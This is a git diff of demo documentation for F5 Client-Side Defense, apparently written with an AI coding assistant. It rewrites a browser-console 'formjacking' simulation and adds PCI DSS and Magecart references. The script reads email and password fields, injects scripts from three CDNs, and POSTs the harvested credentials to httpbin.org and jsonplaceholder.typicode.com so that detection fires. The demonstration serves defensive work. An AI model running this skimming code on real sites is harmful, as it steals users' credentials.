+    console.log('[Formjack] Harvested ' + Object.keys(harvested).length + ' fields:', harvested);
 
-    // Step 2: Inject a third-party script tag (CSD detects new script domains)
-    var script = document.createElement('script');
-    script.src = 'https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js';
-    script.onload = function() {
-        console.log('[CSD Demo] Third-party script loaded from cdn.jsdelivr.net');
-    };
-    document.head.appendChild(script);
-    console.log('[CSD Demo] Injected third-party script tag (cdn.jsdelivr.net)');
+    // Phase 2: Inject third-party scripts from 3 CDN domains
+    console.log('\\n[Supply Chain] Phase 2: Multi-CDN script injection');
+    var cdns = [
+        { url: 'https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js', name: 'jsdelivr' },
+        { url: 'https://cdnjs.cloudflare.com/ajax/libs/moment.js/2.30.1/moment.min.js', name: 'cdnjs' },
+        { url: 'https://unpkg.com/underscore@1.13.7/underscore-min.js', name: 'unpkg' }
+    ];
+    cdns.forEach(function(cdn) {
+        var script = document.createElement('script');
+        script.src = cdn.url;
+        script.onload = function() {
+            console.log('[Supply Chain] Loaded from ' + cdn.name + ': ' + cdn.url);
+        };
+        script.onerror = function() {
+            console.log('[Supply Chain] Load attempted from ' + cdn.name);
+        };
+        document.head.appendChild(script);
+        console.log('[Supply Chain] Injected script tag: ' + cdn.name);
+    });
 
-    // Step 3: Exfiltrate harvested data to external domains
-    var payload = JSON.stringify(harvested);
+    // Phase 3: Exfiltrate harvested data to external endpoints
+    console.log('\\n[Exfil] Phase 3: Data exfiltration');
+    var payload = JSON.stringify({
+        type: 'combined_demo',
+        credentials: harvested,
+        page: window.location.href,
+        timestamp: Date.now()
+    });
+
     fetch('https://httpbin.org/post', {
         method: 'POST',
         mode: 'no-cors',
         body: payload
     }).then(function() {
-        console.log('[CSD Demo] Data exfiltrated to httpbin.org');
+        console.log('[Exfil] Data sent to httpbin.org');
     });
+
     fetch('https://jsonplaceholder.typicode.com/posts', {
         method: 'POST',
         mode: 'no-cors',
         headers: { 'Content-Type': 'application/json' },
         body: payload
     }).then(function() {
-        console.log('[CSD Demo] Data exfiltrated to jsonplaceholder.typicode.com');
+        console.log('[Exfil] Data sent to jsonplaceholder.typicode.com');
     });
 
-    console.log('[CSD Demo] Simulation complete. Detection takes 5-10 minutes to appear in the CSD console.');
+    // Summary
+    console.log('\\n' + '='.repeat(50));
+    console.log('[CSD Demo] Simulation complete');
+    console.log('[CSD Demo] Fields harvested: ' + Object.keys(harvested).length);
+    console.log('[CSD Demo] Scripts injected: ' + cdns.length + ' (3 CDN domains)');
+    console.log('[CSD Demo] Exfil channels: 2 (fetch POST)');
+    console.log('[CSD Demo] Detection takes 5-10 minutes to appear in the CSD console.');
+    console.log('='.repeat(50));
 })();`;
 
 ## Trigger Detection
 
-CSD monitors JavaScript behavior inside the browser. Unlike WAF or Bot Defense, you cannot trigger CSD detection with curl commands — it requires real browser-side script activity. The following script simulates a formjacking attack by harvesting existing form field values, injecting a third-party script, and exfiltrating data to external domains.
+CSD monitors JavaScript behavior inside the browser. Unlike WAF or Bot Defense, you cannot trigger CSD detection with curl commands — it requires real browser-side script activity. The following combined script triggers all three CSD detection signals in a single execution: form field harvesting, third-party script injection from multiple CDN domains, and data exfiltration to external endpoints.
 
-### Run the Simulation Script
+### Run the Combined Simulation Script
 
 <Steps>
 1. Navigate to the Juice Shop **login page** at `https://botdemo.sales-demo.f5demos.com/#/login`
@@ -67,9 +97,9 @@ CSD monitors JavaScript behavior inside the browser. Unlike WAF or Bot Defense, 
 
 4. Paste the following script into the console and press **Enter** — it runs automatically as a self-executing function
 
-   <Code code={triggerScript} lang="js" title="Formjacking Simulation" />
+   <Code code={combinedScript} lang="js" title="Combined Detection Script" />
 
-5. Observe the `[CSD Demo]` console output confirming each step: field harvesting, script injection, and data exfiltration
+5. Observe the phased `[CSD Demo]` console output confirming each step: field harvesting, script injection from 3 CDN domains, and data exfiltration
 
    ![Console output after running the simulation script](/csd/images/devtools-console-output.png)
 </Steps>
@@ -80,17 +110,21 @@ Detection takes **5-10 minutes** to appear on the CSD dashboard. If alerts are n
 
 ### What the Script Does
 
-The simulation replicates the three behaviors CSD is designed to detect:
+The combined simulation triggers all three CSD detection signals:
 
 | Behavior | What the Script Does | What CSD Sees |
 | --- | --- | --- |
-| **Field harvesting** | Reads values from existing `input` elements (email, password) | Scripts reading sensitive form fields |
-| **Script injection** | Appends a `<script>` tag loading lodash from `cdn.jsdelivr.net` | New third-party script domain appearing on the page |
-| **Data exfiltration** | Sends harvested data via `fetch` to `httpbin.org` and `jsonplaceholder.typicode.com` | Network calls to external domains |
+| **Field harvesting** | Reads values from existing `input` elements (email, password) | Scripts reading sensitive form fields — flagged High Risk |
+| **Script injection** | Appends 3 `<script>` tags loading from `cdn.jsdelivr.net`, `cdnjs.cloudflare.com`, and `unpkg.com` | 3 new third-party script domains on the page |
+| **Data exfiltration** | Sends harvested data via `fetch` to `httpbin.org` and `jsonplaceholder.typicode.com` | Network calls to external domains (note: fetch destinations appear as script network interactions, not in the Network domain view) |
 
 <Aside type="note">
-CSD only tracks form fields that exist in the DOM at **page load**. Dynamically created fields are not monitored. This is why the script reads existing fields rather than injecting new ones.
+CSD only tracks form fields that exist in the DOM at **page load**. Dynamically created fields are not monitored. The Network view shows **script-load source domains** only — fetch/XHR destinations do not appear there. See [CSD Capabilities — Detection Boundaries](/csd/capabilities/#detection-boundaries) for the full list of limitations.
 </Aside>
+
+### Advanced Simulations
+
+For presenters who want to demonstrate specific attack categories individually, the [Attack Script Library](/csd/attack-scripts/) provides 10 targeted scripts organized by attack type: formjacking, digital skimming, supply chain injection, data exfiltration, DOM manipulation, and a maximum stress test.
 
 ## Dashboard
 
@@ -107,6 +141,14 @@ The summary cards show **actioned** script domains:
 - **Transactions Consumed** — CSD telemetry events processed this month (confirms CSD is active)
 
 The domain table lists **third-party script source domains** that have been classified. It does not show the protected application domain itself. Each row shows the domain status, last seen timestamp, domain category, and the locations (URLs) where scripts from that domain were found.
+
+After running the combined simulation, the following domains should appear once they are actioned:
+
+| Domain | Source |
+| --- | --- |
+| `cdn.jsdelivr.net` | Injected script (lodash) |
+| `cdnjs.cloudflare.com` | Injected script (moment.js) |
+| `unpkg.com` | Injected script (underscore) |
 
 <Aside type="note">
 If no third-party scripts have been actioned yet, the domain table may show "No data found." This is expected — new detections appear in the **Script List** first, and only move to the dashboard domain table after being actioned (allowed or mitigated).
@@ -133,10 +175,10 @@ Open the **Script List** from the left navigation to view all detected scripts.
 | **Network Interactions** | Count of network calls made by the script |
 | **Form Fields** | Number of form fields the script reads |
 
-After running the simulation, you should see:
+After running the combined simulation, you should see:
 
 - **Application scripts** (e.g., `main.js`, `vendor.js`) flagged as **High Risk / Action Needed** because they read sensitive form fields (email, password)
-- **The injected third-party script** (`cdn.jsdelivr.net/npm/lodash...`) appearing as a new entry
+- **3 new third-party scripts** from `cdn.jsdelivr.net`, `cdnjs.cloudflare.com`, and `unpkg.com` appearing as new entries in the list
 
 <Steps>
 1. Sort by **Risk Level** (High Risk first)
@@ -183,7 +225,13 @@ The **All Domains** tab lists each domain with:
 - **Domain Category** (e.g., Computer and Internet Info)
 - **Added to Allow/Mitigate List** status (Unlisted, Allowed, or Mitigated)
 
-After running the simulation, `cdn.jsdelivr.net` should appear as a new domain entry because the injected `<script>` tag loaded JavaScript from that domain.
+After running the combined simulation, these domains should appear as new entries because the injected `<script>` tags loaded JavaScript from these CDNs:
+
+| Domain | Library Loaded |
+| --- | --- |
+| `cdn.jsdelivr.net` | lodash |
+| `cdnjs.cloudflare.com` | moment.js |
+| `unpkg.com` | underscore |
 
 Use the **Mitigate List** and **Allow List** tabs to review domains that have already been actioned.
 
@@ -229,3 +277,5 @@ From the **Dashboard**, click the **...** actions menu on a flagged domain and s
 </Steps>
 
 Mitigated scripts are blocked from executing on the next page load. Mitigation is reversible — removing the domain from the Mitigate List restores script execution.
+
+For programmatic mitigation via the API, see [API Automation — Mitigation](/csd/automation/#mitigation).

--- a/docs/references.mdx
+++ b/docs/references.mdx
@@ -1,7 +1,7 @@
 ---
 title: References
 sidebar:
-  order: 7
+  order: 9
 ---
 
 ## Documentation
@@ -17,6 +17,23 @@ sidebar:
 ## Video
 
 - [Client-Side Defense Demo](https://www.youtube.com/watch?v=esQtt2Ek3Ug) — Video walkthrough
+
+## PCI DSS
+
+- [PCI DSS v4.0 Standard](https://www.pcisecuritystandards.org/document_library/) — Full standard document library
+- **Requirement 6.4.3** — Manage all payment page scripts: maintain inventory, provide written authorization and justification, verify integrity
+- **Requirement 11.6.1** — Deploy tamper-detection mechanisms on payment pages to alert on unauthorized modifications to HTTP headers and page content
+
+## Threat Research
+
+- [OWASP Client-Side Security Risks](https://owasp.org/www-project-web-application-security-testing/) — OWASP web application security testing guide
+- [Magecart Threat Research](https://www.riskiq.com/what-is-magecart/) — Overview of Magecart groups and digital skimming campaigns
+- **British Airways breach (2018)** — Magecart Group 6 injected a skimmer into the BA payment page, compromising 380,000 transactions
+- **Ticketmaster breach (2018)** — Supply chain attack via compromised Inbenta chatbot script that skimmed payment card data
+
+## Industry Standards
+
+- [OWASP Top 10 Client-Side Security Risks](https://owasp.org/www-project-top-10-client-side-security-risks/) — Top client-side security risks project
 
 ## Related Demo Guides
 


### PR DESCRIPTION
## Summary

- Add `capabilities.mdx` — CSD features, detection model, PCI DSS v4.0 mapping, threat coverage matrix
- Rewrite `demo-detection.mdx` — combined simulation script triggering all 3 detection signals (field reads, script injection from 3 CDN domains, exfiltration), cross-links to attack script library
- Add `attack-scripts.mdx` — 10 attack simulation scripts in 6 categories (formjacking, digital skimming, supply chain, exfiltration, DOM manipulation, combined stress test)
- Update `references.mdx` — add PCI DSS, threat research, and industry standards sections; bump sidebar order to 9

Closes #102

## Test plan

- [ ] Docker dev preview renders all 4 pages without MDX errors
- [ ] Sidebar ordering matches: Capabilities (6), Detection & Mitigation (7), Attack Script Library (8), References (9)
- [ ] All internal cross-links resolve correctly
- [ ] Combined simulation script runs in DevTools Console and produces expected `[CSD Demo]` output
- [ ] CI checks pass (super-linter, markdown, editorconfig)

🤖 Generated with [Claude Code](https://claude.com/claude-code)